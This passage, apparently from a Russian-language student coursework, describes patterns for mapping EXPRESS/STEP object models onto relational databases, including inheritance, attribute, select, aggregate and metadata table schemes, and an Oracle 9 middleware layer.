вложенных структур данных, основанных на базовых, перечислимых, ассоциативных, селективных и агрегатных типах данных;
простых и сложных объектных типов в рамках модели множественного наследования;
информационных схем.
Не менее существенными для практического применения являются часто противоречащие друг другу проблемы:
выбора стратегии отображения в соответствии с контекстом использования семантики информационной модели;
поддержки метаданных в реляционном представлении и их конструктивного применения в ходе пользовательских сессий;
эффективности реализации объектных запросов и операций манипулирования объектами (создание, модификация, удаление);
оптимизации используемых ресурсов, включая затраты памяти;
сопровождаемости решений и их гибкости по отношению к возможной эволюции используемых прикладных моделей.
6.2 Отображение информационных схем
Вопрос о выборе стратегии отображения в рамках схемо-зависимого (СЗ) или схемо-независимого (СН) подходов является наиболее принципиальным для систематизации методов объектно-реляционного отображения и их адекватного применения в приложениях.
6.2.1 Схемо-независимая стратегия
Схемо-независимая стратегия ориентирована на использование единой реляционной схемы для представления произвольных прикладных данных, модели которых специфицированы на EXPRESS. Для приложений, оперирующих одновременно с несколькими перманентно изменяемыми прикладными моделями, применение схемо-независимая стратегии является наиболее предпочтительным. Сопровождение и администрирование реляционной базы данных с фиксированной системой таблиц, состав и структура которой не меняется, достаточно просты.
К издержкам стратегии следует отнести необходимость поддержки и использования словарей метаданных, без которых реализация промежуточного объектно-реляционного слоя невозможна. Сами словари также могут быть представлены в виде таблиц, хранящих информацию об исходных прикладных моделях и включенных в состав единой реляционной системы. Другим недостатком является относительно низкая эффективность выполнения базовых операций манипулирования объектами, поскольку их реализация сопряжена с необходимым дополнительным анализом сопутствующих метаданных.
6.2.2 Схемо-зависимая стратегия
Схемо-зависимая стратегия в большей степени ориентирована на приложения, оперирующие с единственной моделью данных, не изменяемой на протяжении всего жизненного цикла проекта. Организация реляционной системы в этом случае может отражать и учитывать особенности конкретной прикладной модели. Схемо-зависимая стратегией не исключается и одновременная поддержка нескольких моделей. Однако в силу сложности сопровождения и администрирования реляционных баз данных с большим количеством таблиц ее использование в этом случае может оказаться крайне обременительным.
Достоинством схемо-зависимой стратегии является возможность более эффективной реализации объектных запросов и операций манипулирования объектами за счет непосредственной адресации к таблицам с хранимыми данными, в отличие от схемо-независимой стратегии, где такая адресация осуществляется косвенно через таблицы метаданных.
Как разновидность схемо-зависимой стратегии может рассматриваться смешанная (СМ) стратегия, заключающаяся в организации системы таблиц по заданной прикладной модели при одновременном использовании словарей метаданных. При определенной избыточности в представлении данных такая стратегия обеспечивает более эффективную реализацию сложных запросов непосредственно средствами реляционной СУБД, поскольку вся необходимая метаинформация может также храниться в виде таблиц и быть доступной при обработке запросов.
6.3 Отображение наследования классов
Паттерны, предназначенные для отображения отношений простого наследования между классами, являются хорошо известными. В этой курсовой работе мы обсудим возможные варианты отображений в рамках развитой модели множественного наследования языка EXPRESS.
6.3.1 Паттерн OneInheritanceHierarchy–OneTable
Первый, наиболее простой паттерн OneInheritanceHierarchy–OneTable соответствует случаю отображения всех конкретных родственных классов, имеющих общий набор прародителей, в одну таблицу <Hierarchy>_Instances. Прародителем будем называть класс-предок, у которого нет собственных родителей.
В случае простого наследования данный паттерн трансформируется в стратегию представления конкретных классов в каждом дереве наследования одной реляционной таблицей. Атрибуты всех родственных классов, являющихся вершинами дерева, отображаются в столбцы данной таблицы. Если иерархия наследования классов в прикладной модели представлена несколькими деревьями, то каждому такому дереву будет соответствовать отдельная таблица.
В общем случае множественного наследования иерархия классов представляется набором таблиц, каждая из которых соответствует одному из сочетаний прародителей. Все атрибуты классов, объединенных единым набором прародителей, отображаются в столбцы конкретной таблицы из этого набора. Для записей объектов, в которых не определены какие-либо атрибуты, в соответствующих столбцах прописываются нулевые значения.
Достоинством паттерна является возможность эффективной реализации базовых операций над произвольными объектами без дополнительных расходов на сборку значений атрибутов из разных таблиц и их обратное распределение по ним. Также непосредственно реализуется полиморфное чтение. Единственная сложность состоит в определении типа запрашиваемых объектов. Простота поддержки и развития такой СЗ стратегии делает ее довольно привлекательной. Недостатком является излишнее потребление памяти за счет избыточного хранения нулевых значений, а иногда и необходимость индексирования большого числа столбцов для ускорения выполнения запросов по значениям отдельных атрибутов. При большой глубине наследования классов, что является типичным в научных и промышленных моделях STEP, это может оказаться критичным как для потребления памяти, так и для производительности.
6.3.2 Паттерн OneClass–OneTable
В паттерне OneClass–OneTable каждый конкретный или абстрактный классы в иерархии наследования представляются отдельной таблицей <Class>_Instances, при этом собственные атрибуты данного класса отображаются в ее столбцы. Для связи с наследуемыми атрибутами она хранит вторичные ключи соответствующих записей в таблицах родительских классов. В случае простого наследования — один вторичный ключ, в случае множественного наследования — несколько вторичных ключей, каждый из которых соответствует таблице одного из родителей.
Поскольку при множественном наследовании возможны неоднозначные ситуации, когда атрибуты одного и того же базового класса наследуются несколько раз, реализация данного паттерна сопряжена с анализом и разрешением подобных ситуаций. В языке EXPRESS допустимо лишь виртуальное наследование, при котором любые атрибуты базовых классов должны наследоваться единожды. Поэтому при анализе реконструируется основное дерево наследования, а ветви, приводящие к циклам, игнорируются в результате обнуления соответствующих вторичных ключей к записям в таблицах родительских классов. Случаи многократного наследования атрибутов обрабатываются автоматически и не требуют дополнительного анализа.
Паттерн обеспечивает хорошую производительность на операциях полиморфного чтения, однако реализация базовых операций над объектами сопряжена с расходами на сборку значений атрибутов из нескольких таблиц при чтении и их рассылку по таблицам при записи и модификации. При глубокой иерархии наследования такие издержки могут оказаться существенными.
Затраты памяти в реализации данного паттерна близки к оптимальным, поскольку хранение вторичных ключей не требует больших накладных расходов. Как элемент схемо-зависимой стратегии паттерн не обеспечивает простоту поддержки и эволюции сложных прикладных моделей с развитой иерархией наследования.
6.3.3 Паттерн OneInheritancePath–OneTable
Некоторые недостатки предыдущего паттерна компенсируются в результате сериализации таблиц классов по отношениям наследования. В паттерне OneInheritancePath–OneTable каждому конкретному классу соответствует своя таблица <Concrete_Class>_Instances, в столбцы которой отображаются все атрибуты класса, включая наследуемые от родителей.
Паттерн обеспечивает хорошую эффективность на базовых операциях чтения, записи, модификации, удаления, однако полиморфные операции оказываются достаточно дорогими, поскольку сопряжены с просмотром всех таблиц классов, наследуемых от заданного. Затраты памяти здесь оптимальны, поскольку не требуется хранение избыточных полей. Важным достоинством паттерна в ряде случаев оказывается равномерное распределение запросов и сопряженных с ними блокировок по таблицам схемы. В отличие от предыдущих паттернов наследования, в которых превалирующая нагрузка приходится на корневые таблицы прародителей, данный паттерн обеспечивает большую эффективность за счет более равномерного распределения записей.
Однако в отношении поддержки эволюции схем паттерн довольно критичен, поскольку все запросы, основанные на полиморфных операциях, требуют модификации с учетом каждого нового наследуемого класса, включаемого в прикладную модель.
6.3.4 Паттерн AllClasses–OneTable
Паттерн AllClasses–OneTable предполагает использование единой таблицы Instances для представления дескрипторов объектов всех классов. В столбцах таблицы хранятся идентификатор объекта и его тип. Контекст использования паттерна связан с представлением атрибутов классов в виде самостоятельных таблиц. В этом случае связь между таблицами экземпляров классов и значений их атрибутов осуществляется через внешние ключи записей объектов (см. раздел 6.4.2.2). Предполагается, что значения атрибутов одного и того же типа хранятся в единой таблице независимо от их вхождения в состав того или иного класса. Тем самым достигается существенная для схемо-независимой стратегии инвариантность реляционной схемы по отношению к прикладным моделям. Связь простого объекта с его классом осуществляется через внешний ключ записи в таблице классов Entities (см. раздел 6.5). Для сложных объектов предусмотрен внешний ключ записи в соответствующей таблице сложных классов Complex_Entities.
6.3.5 Паттерн BLOB
Паттерн BLOB также предполагает использование единой таблицы BLOB Instances для представления объектов всех классов. Однако в отличие от паттерна AllClasses–OneTable в данной таблице используется дополнительный столбец для хранения значений атрибутов, упакованных в бинарную или текстовую строку переменной длины. Задача упаковки значений в строку и их распаковки для клиентских приложений ложится непосредственно на промежуточный слой программного обеспечения. Хотя чтение и запись данных объекта осуществляются за одну операцию обращения к таблице, дополнительные расходы приходятся на обработку строк промежуточным слоем. По существу в этом случае BLOB стратегия объединяет в себе паттерны наследования, агрегации и ассоциации.
Возможны разновидности данного паттерна, связанные с различными способами представления строки значений атрибутов как в бинарном формате, так и в одном из текстовых метаформатов. В частности, применительно к метамодели EXPRESS стандарт STEP определяет формат текстового кодирования прикладных данных (ISO-10303-21) и несколько альтернативных способов XML разметки документов (ISO-10303-28), порождаемых соответствующей прикладной моделью данных, специфицируемой на языке EXPRESS.
Главным недостатком BLOB паттерна является невозможность разрешения запросов и реализации объектных операций непосредственно средствами реляционной СУБД. В данном случае она играет роль простого хранилища, а эти функции выполняет промежуточный слой. Как паттерн схемо-независимой стратегии он не требует больших затрат на поддержку реляционной схемы при эволюции прикладной модели, поскольку связанные с этими изменениями функции затрагивают лишь промежуточный слой.
6.4 Отображение атрибутов
Атрибуты классов представляются либо столбцами соответствующих таблиц объектов классов, либо самостоятельными таблицами. Как и в случае паттернов отображения классов, альтернативы представления атрибутов во многом определяются применяемой схемо-зависимой или схемо-независимой стратегией объектно-реляционного отображения. Рассмотрим их, следуя введенной классификации паттернов отображения атрибутов простых, селективных, агрегатных типов и ассоциаций.
6.4.1 Представление простых типов
Соответствие базовых типов языка EXPRESS типам данных в SQL достаточно прозрачно. В таблицу 1 сведены базовые типы EXPRESS и возможные способы их представления в некоторых популярных коммерческих и свободно распространяемых реляционных СУБД.
Таблица 1. Соответствие базовых типов EXPRESS и SQL в реляционных СУБД
ЕXPRESS
MySQL
PostgreSQL
Oracle
INTEGER
INTEGER
INTEGER
INTEGER
REAL
REAL,
DOUBLE PRECISION
FLOAT8,
DOUBLE PRECISION
NUMBER,
DOUBLE PRECISION
REAL(n)
FLOAT(n)
NUMERIC(n)
NUMBER(n)
NUMBER
REAL,
DOUBLE PRECISION
FLOAT8,
DOUBLE PRECISION
NUMBER,
DOUBLE PRECISION
BOOLEAN
CHAR(1),
TINYINT
CHAR(1),
SMALLINT
CHAR(1),
INTEGER
LOGICAL
CHAR(1),
TINYINT
CHAR(1),
SMALLINT
CHAR(1),
INTEGER
ENUMERATION
VARCHAR(128),
INTEGER
VARCHAR(128),
INTEGER
VARCHAR2(128),
INTEGER
STRING
TEXT (up to 64K),
LONGTEXT (up to 4Gb)
TEXT (about 1Gb)
VARCHAR2(4000),
LONG (up to 2Gb)
STRING(n)
VARCHAR(n)
VARCHAR(n)
VARCHAR2(n)
STRING(n) FIXED
CHAR(n)
CHAR(n)
CHAR(n)
BINARY
BLOB (up to 64K),
LONGBLOB (up to 4Gb)
BYTEA
LONG RAW (up to 2Gb)
BINARY(n)
VARCHAR(n) BINARY
VARBIT(n)
RAW(n)
BINARY(n) FIXED
CHAR(n) BINARY
BIT(n)
RAW(n)
ENTITY (reference)
VARCHAR(128),
FOREIGN KEY
VARCHAR(128),
FOREIGN KEY
VARCHAR2(128),
FOREIGN KEY
Помимо указанных вариантов представления точности числовых значений и ограничений длины строковых и двоичных переменных, важные отличия затрагивают способы представления атрибутов типа BOOLEAN, LOGICAL и ENUMERATION. С точки зрения семантики языка EXPRESS значения этих типов упорядочены, и для них определены операции сравнения. Поэтому, если предполагается реализация запросов с использованием подобных операций, более предпочтительным выглядит представление переменных этих типов как целых чисел. В этом случае функция интерпретации значений в терминах исходной прикладной модели возлагается на промежуточный программный слой, возможно, с использованием словарей метаданных. Значения, представленные в виде символьных строк, интерпретируются непосредственно клиентскими приложениями. Средствами СУБД может контролироваться также и корректность данных, для чего должны быть наложены соответствующие ограничения на область допустимых значений.
6.4.2 Отображение атрибутов простых типов
6.4.2.1 Паттерн Attribute–Column
Реализация паттерна представления атрибутов простых типов в виде столбцов соответствующих таблиц объектов довольно прозрачна и естественна для применения в рамках схемо-зависимой стратегии. В этом случае каждая таблица объектов классов включает в себя соответствующий столбец для представления значений простого атрибута. Тип столбца определяется возможными вариантами представления базовых типов языка EXPRESS, рассмотренными в предыдущем разделе. В качестве имени столбца могут быть выбраны либо имя атрибута, уникальное в пределах класса, либо конкатенация имен класса и атрибута, уникальная в пределах информационной схемы.
6.4.2.2 Паттерн Attribute–Table
Данный паттерн предполагает использование самостоятельных таблиц для представления простых однотипных атрибутов. Его применение возможно лишь в рамках схемо-независимой и смешанной стратегий с одновременным использованием таблиц метаданных. Привязка значений атрибутов к дескрипторам объектов осуществляется по внешним ключам записей объектов в таблице Instances, представленным в таблицах атрибутов. Для идентификации хранимых величин как значений атрибутов определенных классов в них также хранятся внешние ключи записей метаинформации о соответствующих атрибутах в таблице Attributes в составе системы таблиц метаданных.
Независимо от принадлежности различным классам значения однотипных атрибутов хранятся в одной таблице. Для представления всех атрибутов простых типов, допускаемых метамоделью языка EXPRESS, в общей реляционной схеме достаточно иметь фиксированный набор из шести таблиц: Integer_Attributes, Real_Attributes, Logical_Attributes, String_Attributes, Binary_Attributes и Enum_Attributes. Предполагается, что в схеме хранения данные типа NUMBER всегда представимы типом REAL, а данные типа BOOLEAN — типом LOGICAL.
6.4.3 Отображение ассоциаций
Язык EXPRESS допускает определение разного рода ассоциативных отношений между классами, отличающихся как по типу, так и по кратности. Ассоциации однонаправлены в том смысле, что ассоциируемый объект может быть получен по соответствующей ссылке из объекта, содержащего ассоциативную связь. Вместе с тем, допускается задание двунаправленных связей с помощью определения обратных атрибутов (INVERSE) в ассоциируемом классе. При определении прямой и обратной ассоциации допустимо указание диапазона кратности связи как ограничения, налагаемого на количество объектов, участвующих в ней как со стороны ассоциируемых, так и со стороны ассоциирующих объектов.
Ассоциации “один-к-одному” реализуются как простые атрибуты, имеющие тип объектной ссылки. Ассоциации “один-ко-многим” представляются средствами языка как агрегаты простых ассоциативных отношений. Ассоциации вида “многие-ко-многим” непосредственно конструкциями языка не поддерживаются, однако могут быть представлены в прикладной модели в виде дополнительных объектов, через которые на основе множественных ассоциаций могут быть установлены требуемые отношения между прикладными объектами.
Рассмотрим задачу отображения множественных ассоциаций вида “один-ко-многим” как наиболее типовой случай, к которому могут быть непосредственно редуцированы ассоциации “один-к-одному” и “многие-ко-многим”. Видятся три наиболее содержательных случая представления ассоциаций и соответствующих им паттерна отображения.
6.4.3.1 Паттерн ForeignKeyAssociation
Данный паттерн применим к прямым множественным ассоциациям при условии, что соответствующая обратная ассоциация является простой. Иными словами, с каждым объектом, участвующим в связи, может быть ассоциировано некоторое множество объектов. Однако каждый объект таких множеств может участвовать только в одной обратной ассоциации этой связи. Паттерн реализуется в рамках схемо-зависимой стратегии путем включения в таблицу ассоциированного класса <Associated_Class> (класса, на который содержится ссылка в классе ассоциации) внешнего ключа на таблицу <Associating_Class>. Имя ключа может соответствовать имени связи в соответствующей спецификации <Associating_Class>. В случае упорядоченных множественных ассоциаций (LIST или ARRAY OF ENTITY) может потребоваться дополнительный столбец в таблице <Associated_Class> для хранения индекса ассоциации. Если связь реализуется как элемент вложенной агрегатной конструкции, то в данной таблице предусматривается необходимое число столбцов индексов для каждого из упорядоченных множеств, участвующих в ней. Аналогично, если связь реализуется как элемент селективной конструкции, то в таблицу добавляется соответствующий столбец для представления дискриминатора. Более подробно эти случаи описаны в паттернах отображения селективных и агрегатных конструкций.
Чтение ассоциирующего объекта реализуется посредством одной операции соединения или двух операций запроса к таблицам <Associated_Class> и <Associating_Class>, один из которых является множественным. Запись объекта также сопряжена с множественной операцией модификации внешних ключей в записях ассоциированных объектов. Затраты памяти в реализации паттерна близки к оптимальным, поскольку издержки приходятся лишь на хранение дополнительного внешнего ключа, а иногда и индекса ассоциации в таблице <Associated_Class>, для каждой связи, в которой ассоциируемый класс участвует.
6.4.3.2 Паттерн ClassAssociation
Данный паттерн позволяет непосредственно представить множественные ассоциативные отношения в результате использования отдельной таблицы в рамках схемо-зависимой стратегии. Такая таблица <Class1>_<Class2>_Associations создается для каждой пары классов, участвующих в ассоциативной связи, и содержит пары внешних ключей записей в таблицах классов ассоциируемых и ассоциирующих объектов.
В отличие от предыдущего, данный паттерн обеспечивает представление произвольных ассоциативных отношений, не ограниченных кратностью обратных ассоциаций.
6.4.3.3 Паттерн GenericAssociation
Данный паттерн соответствует схемо-независимой стратегии. Он реализует идею унифицированного представления всех видов ассоциаций, участвующих в прикладной модели, одной таблицей Associations. Ассоциативные связи в таблице устанавливаются через ссылки на дескрипторы прикладных объектов в таблице Instances в виде внешних ключей соответствующих записей в ней. Поскольку для реализации схемо-независимой стратегии важна привязка элементов данных к прикладной модели, для каждой ассоциации в таблице Associations хранится также ссылка на метаинформацию о соответствующем атрибуте, представленную в таблице Attributes. Если ассоциация устанавливается как элемент агрегатной или селективной конструкции, то указывается также ссылка на соответствующую запись в таблицах Aggregates или Selections. Таким образом, таблица Associations хранит множество записей обо всех видах ассоциаций прикладных данных, контексте их использования в составе агрегатных или селективных конструкций и их привязке к прикладной информационной модели, представимыми соответствующими таблицами метаданных.
6.4.4 Отображение селективных типов
Поскольку селективные типы данных в языке EXPRESS по существу являются альтернативным представлением других базовых типов, паттерны их отображения тесно связаны с соответствующими паттернами отображения тех базовых типов, на которых они основаны. Важно отметить, что селективные типы могут быть основаны на простых типах данных, ассоциативных типах, агрегатах различного вида и на ранее предопределенных селективных типах иной организации. Дискриминатор установки селективного элемента данных в одно из альтернативных состояний в реляционной схеме представим столбцом в таблице хранения значений атрибутов объектов. Тип столбца дискриминатора соответствует рассмотренным способам отображения данных перечислимого типа ENUMERATION (см. раздел 6.4.1). А способ представления самого состояния элемента определяется одним из паттернов отображения атрибутов базовых типов. Поскольку в качестве базовых могут выступать пользовательские типы данных, эквивалентные с точки зрения способов представления в реляционной схеме, то для исключения избыточности и минимизации затрат памяти целесообразно выделить подмножество неэквивалентных базовых типов и предусмотреть способы их адекватного реляционного представления. При этом дискриминатор селективного элемента позволит однозначно идентифицировать, в каком именно состоянии хранимые данные находятся.
Удобно различать два встречаемых на практике случая определения селективного типа. Первый случай соответствует селективным типам, базируемым только на простых и ассоциативных типах данных, учитывая возможный вложенный характер составных типов. Второй общий случай охватывает все возможные варианты определения селективного типа на основе произвольной комбинации базовых, в том числе и с участием агрегатов.
6.4.4.1 Паттерн Select–Columns
Данный паттерн применим к отображению атрибутов селективных типов, относящихся к первому случаю. В реляционной схеме селективный элемент такого вида представляется набором столбцов в таблице объектов класса. Один из столбцов резервируется для хранения дискриминатора селективных элементов. А остальные используются для хранения всех возможных альтернативных неэквивалентных состояний самих селективных данных. В случаях, когда селективный тип является составным вложенным, в таблице резервируется необходимое число столбцов под дискриминаторы для каждого вложенного селективного типа, участвующего в определении составного типа, и под каждое неэквивалентное состояние, в котором селективные данные могут находиться.
Достоинством данного паттерна является возможность эффективной реализации базовых операций над объектами с участием атрибутов селективного типа путем непосредственной адресации к таблице объектов. Он может использоваться в сочетании со всеми рассмотренными выше паттернами отображения классов в рамках схемо-зависимой стратегии.
6.4.4.2 Паттерн ClassSelect
В тех случаях, когда в определении атрибута селективного типа участвуют агрегатные конструкции, применение рассмотренного выше паттерна является проблематичным и возникает необходимость представления значений атрибута класса отдельной таблицей <Class>_<Attribute>_Select. Организация данной таблицы повторяет структуру столбцов в предыдущем паттерне отображения за исключением того, что резервируются дополнительные столбцы для хранения индексов элементов агрегатов, участвующих в определении селективного типа. Число столбцов, необходимое для этого, определяется максимальной глубиной вложенности используемых конструкций упорядоченных агрегатов. Для связи с объектами используется ссылка из таблицы <Class>_<Attribute>_Select на соответствующую таблицу объектов классов в виде внешнего ключа записей в ней.
По сравнению с предыдущим паттерном для реализации базовых операций над объектами возникает необходимость доступа к нескольким таблицам, однако при этом он охватывает наиболее общий случай определения атрибутов произвольного селективного типа. Отметим, что вспомогательные операции со значениями селективных атрибутов выполняются достаточно эффективно, поскольку в таблице хранятся только значения, соответствующие одному атрибуту (или нескольким однотипным атрибутам) одного класса. Однако число реляционных таблиц при отображении масштабных прикладных моделей может быть значительным с учетом повторяемости используемых селективных типов в определениях классов.
6.4.4.3 Паттерн HierarchySelect
Настоящий паттерн устраняет отмеченный выше недостаток за счет использования одной таблицы для каждого селективного типа, встречаемого в определении самостоятельной иерархии наследования классов. Однако контекст его использования ограничивается единственным паттерном отображения классов OneInheritanceHierarchy–OneTable. Организация таблицы для каждого селективного типа повторяет предыдущий случай. Для связи с объектами используется внешний ключ записей объектов в таблице <Hierarchy>_Instances. Данный паттерн позволяет существенно сократить число таблиц, необходимых для реляционного представления масштабных прикладных моделей, за счет хранения однотипных селективных данных в единых таблицах. Их размер естественно возрастает, что приводит к замедлению операций работы с хранимыми селективными данными, однако общее число таблиц, критичное для большинства современных реализаций реляционных СУБД, снижается.
6.4.4.4 Паттерн GenericSelect
Данный паттерн предоставляет типовое обобщенное решение для реляционного представления произвольных атрибутов селективного типа. Он применяется в сочетании с паттерном отображения классов AllClasses–OneTable в рамках схемо-независимой стратегии.
Таблица Selections хранит записи дескрипторов селективных данных, включая их дискриминаторы и ссылки на объекты в таблице Instances, атрибутами которых они являются. Сами данные хранятся в таблицах представления простых типов Integer_Elements, Real_Elements, String_Elements, Binary_Elements, Logical_Elements, Enum_Elements и в таблице ассоциаций Associations.
Возможны случаи, когда сами селективные данные являются элементом другой родительской селективной или агрегатной конструкции. Для этого в таблице дескрипторов Selections предусмотрены ссылки на соответствующие родительские селективные и агрегатные элементы данных в виде столбцов внешних ключей записей в таблицах Selections и Aggregates. Такая организация таблиц позволяет представить вложенные конструкции, составленные из данных произвольных типов. Для получения метаинформации о селективном элементе в таблице Selections также хранятся ссылки на соответствующие записи в таблице метаданных Attributes.
6.4.5 Отображение агрегатов
Паттерны отображения атрибутов агрегатных типов в реляционную схему во многом аналогичны паттернам представления селективных типов. Основные отличия затрагивают необходимость представления размерности агрегата вместо дискриминаторов в случае селективных элементов, а также организации специальных таблиц для хранения значений агрегируемых элементов, а также и их индексов в случае упорядоченных множеств и мультимножеств. Число столбцов, необходимое для представления размерности агрегата, определяется глубиной вложенности агрегатных конструкций. Число столбцов, необходимое для представления индексов агрегируемых элементов, определяется глубиной вложенности упорядоченных агрегатов. Организация столбцов для представления значений самих элементов определяется их типом. Для простых типов данная организация тривиальна. Для элементов селективного типа организация столбцов следует описаниям рассмотренных выше паттернов.
В отношении способов представления вложенных типов данных, в том числе основанных на предопределенных конструкциях, паттерны отображения селективных и агрегатных типов довольно близки. Паттерны ClassAggregate и HierarchyAggregate предназначены для использования с паттернами отображения классов OneClass–OneTable, OneInheritancePath–OneTable и OneInheritanceHierarchy–OneTable в рамках схемо-зависимой стратегии. Паттерн GenericAggregate применяется вместе с паттерном AllClasses–OneTable, соответствуя СН стратегии отображения.
6.4.5.1 Паттерн ClassAggregate
Данный паттерн предполагает организацию специальных столбцов для хранения размерностей агрегата непосредственно в таблице объектов класса, а также создание отдельной таблицы <Class>_<Attribute>_Aggregate для хранения значений и индексов элементов агрегата. Такая таблица создается для каждого агрегатного атрибута каждого класса. Для связи с объектами используется ссылка из <Class>_<Attribute>_Aggregate на соответствующую таблицу объектов классов в виде внешнего ключа записей в ней.
Паттерн охватывает наиболее общий случай определения атрибутов произвольного агрегатного типа. При этом число реляционных таблиц при отображении масштабных прикладных моделей обычно велико с учетом повторяемости эквивалентных агрегатных типов в определениях классов.
6.4.5.2 Паттерн HierarchyAggregate
Настоящий паттерн уменьшает число таблиц, необходимых для представления агрегатных данных за счет использования одной таблицы для каждого агрегатного типа, встречаемого в определении самостоятельной иерархии наследования классов. Размер таких таблиц при этом увеличивается, что приводит к замедлению операций работы с хранимыми агрегатными данными, однако общее число таблиц, критичное для большинства современных реализаций реляционных СУБД, снижается. Контекст использования паттерна ограничивается соответствующей схемой отображения классов OneInheritanceHierarchy–OneTable. Для связи с объектами используется внешний ключ записей объектов в таблице <Hierarchy>_Instances.
6.4.5.3 Паттерн GenericAggregate
Данный паттерн предоставляет типовое решение для обобщенного реляционного представления произвольных атрибутов агрегатного типа. Он применяется в сочетании с паттерном отображения классов AllClasses–OneTable в рамках схемо-независимой стратегии.
Таблица Aggregates хранит записи дескрипторов агрегатных данных, включая их размерности и ссылки на объекты в таблице Instances, атрибутами которых они являются. Таблица является родительской для элементов агрегата, хранящихся в других таблицах Integer_Elements, Real_Elements, String_Elements, Binary_Elements, Logical_Elements, Enum_Elements и Associations. В свою очередь, каждая запись в таблице Aggregates может иметь ссылку на запись в этой же таблице, если агрегат является элементом, вложенным в другой родительский агрегат, а также хранить соответствующий индекс в нем. Если агрегат является одним из значений селективного типа, то он ссылается на соответствующую родительскую конструкцию, представляемую записью в таблице Selections. В остальных случаях записи таблицы Aggregates ссылаются на соответствующие записи в таблице Attributes для получения метаинформации об агрегатном атрибуте.
6.5 Отображение метаданных
Для представления метаданных в рамках схемо-независимой и смешанной стратегий объектно-реляционного отображения необходимо предусмотреть специальную систему таблиц, которая в свою очередь может рассматриваться как результат отображения объектно-ориентированной метамодели языка EXPRESS на реляционную модель. Поскольку полная метамодель языка EXPRESS довольно сложна, а объектно-реляционное отображение допускает множество реализаций, в том числе на основе вышеописанных паттернов, ограничимся рассмотрением следующего возможного варианта организации таблиц. Система таблиц, позволяет представить необходимую метаинформацию об EXPRESS схеме, ее составе в виде определяемых простых и объектных типов данных и организации атрибутов в классах объектов. Допустимы расширения реляционной схемы, обеспечивающие представление различного рода ограничений, допускаемых языком EXPRESS.
Таблица Schemas предназначена для представления информационных схем языка EXPRESS, зарегистрированных в реляционной базе данных. Она хранит первичные ключи записей и уникальные имена схем. Defined_Types — это таблица простых типов данных, определяемых пользователем, которая хранит первичный ключ типа, его имя, а также ссылку на базовый тип в виде внешнего ключа записи в этой же таблице. Одиннадцать предопределенных типов, соответствующих семи элементарным типам языка EXPRESS, обобщенным ассоциативному и перечисляемому типам, а также селективному и агрегатному супертипам, заносятся заранее при инициализации таблицы. Предопределенные типы являются листьями в дереве иерархии сложных типов, рекурсивно определяемых пользователем и заносимых в данную таблицу в виде отдельных записей. Defined_Types_To_Schemas — это таблица соответствия определяемых типов данных конкретным схемам. Связь между пользовательским типом и информационной схемой устанавливается через отдельную таблицу, а не через внешний ключ в таблице Defined_Types, поскольку один и тот же тип может включаться в разные схемы, если в спецификации на языке EXPRESS для него определены директивы импорта. Таблица хранит внешние ключи определяемых пользователем типов и соответствующих им информационных схем. Пара внешних ключей «тип–схема» формирует составной первичный ключ записи в таблице Defined_Types_To_Schemas, чем контролируется уникальность включения типа в одну и ту же схему.
Для детального описания перечислимых, селективных и агрегатных типов дополнительно используются таблицы Enumeration_Constants, Select_Types и Aggregate_Types. Таблица Enumerations_Constants содержит списки возможных значений для каждого перечислимого пользовательского типа. Ее столбцы хранят символьные значения перечислимого типа и внешний ключ соответствующей записи типа в таблице Defined_Types. Аналогичным образом, таблица Select_Types представляет списки базовых типов, входящих в определение каждого конкретного селективного типа, в виде внешних ключей записей типов в таблице Defined_Types. В столбцах таблицы агрегатных типов Aggregate_Types содержится информация о типе агрегата (ARRAY, LIST, SET или BAG), базовом типе его элементов в виде внешнего ключа соответствующей записи в таблице Defined_Types, разрешенных значениях нижней и верхней границ агрегата, признаках допустимости наличия уникальных и неопределенных элементов.
Таблица классов Entities предназначена для представления объектных типов информационной схемы, зарегистрированной в базе данных. Ее столбцы хранят первичные ключи записей и уникальные имена сущностей. Аналогично определяемым типам, привязка классов к схеме осуществляется через отдельную таблицу соответствия Entities_To_Schemas. Для реконструкции отношений наследования между классами используется таблица Inheritance_Relations, в которой данные отношения представлены парами внешних ключей записей классов родителей и потомков в таблице Entities. Поскольку язык EXPRESS допускает множественное наследование с признаками AND или ANDOR, важно иметь альтернативное представление иерархии наследования в виде множеств всех родительских классов, данные которых включаются в конструируемые объекты сложных классов. Для этой цели используется таблица Complex_Entities. Для единообразия обработки объектов простые классы также представляются записями этой таблицы. Таблица Complex_Entities_To_Entities хранит все соответствия сложных классов родительским классам в виде пары внешних ключей записей в таблицах Complex_Entities и Entities.
Наконец, таблица атрибутов Attributes содержит столбцы для представления имени атрибута, класса, в котором данный атрибут определяется (или переопределяется), в виде соответствующего внешнего ключа записи в таблице Entities, типа атрибута в виде внешнего ключа записи в таблице Defined_Types, признака обязательности значений и контекста использования (EXPLICIT, DERIVED или INVERSE).
В заключение отметим, что приведенная схема достаточно удобна для реализации промежуточного объектно-реляционного слоя в рамках схемо-независимой и смешанной стратегий непосредственно средствами реляционной СУБД. Вместе с тем, возможен ряд ее модификаций, связанных с иными способами реляционного представления метамодели EXPRESS путем использования альтернативных паттернов отображения прикладных объектно-ориентированных моделей, рассмотренных выше.
7. Реализация промежуточного объектно-реляционного слоя в
среде Oracle 9
В настоящее время в рамках проекта создания программной платформы для интеграции приложений ведется разработка промежуточного объектно-реляционного слоя общего назначения. Объектно-реляционный слой предназначен для работы с произвольными прикладными объектно-ориентированными данными, модели которых описаны на языке EXPRESS.
Для интегрируемых приложений объектно-реляционный слой предоставляет программные объектно-ориентированные интерфейсы доступа к прикладным данным на некоторых популярных языках реализации). Организация этих интерфейсов следует перечисленным выше принципам прозрачного манипулирования хранимыми данными, декларируемым Манифестом объектно-ориентированных баз данных. Интерфейсы предоставляют функционально развитый набор операций для манипулирования хранимыми и временными объектами, включая операции создания, модификации, удаления объектов, навигации по их однонаправленным и двунаправленным ассоциативным связям и выборки объектов на основе языка запросов. Запросы базируются на конструкции QUERY языка EXPRESS, позволяющей задать произвольный предикат на множестве объектов и отобрать те из них, которые удовлетворяют условию данного предиката. Интерфейсы предусматривают несколько пессимистических и оптимистических моделей транзакций с различными способами изоляции на уровне отдельных прикладных объектов и самостоятельных объектных популяций, содержательных для коллективных пользовательских сессий и участвующих в них приложений.
По спецификации данные интерфейсы совместимы с соответствующими частями международного информационного стандарта по интероперабельности STEP и поэтому обеспечивают интегрируемость широкого класса унаследованных и вновь создаваемых программных систем научного и промышленного назначения.
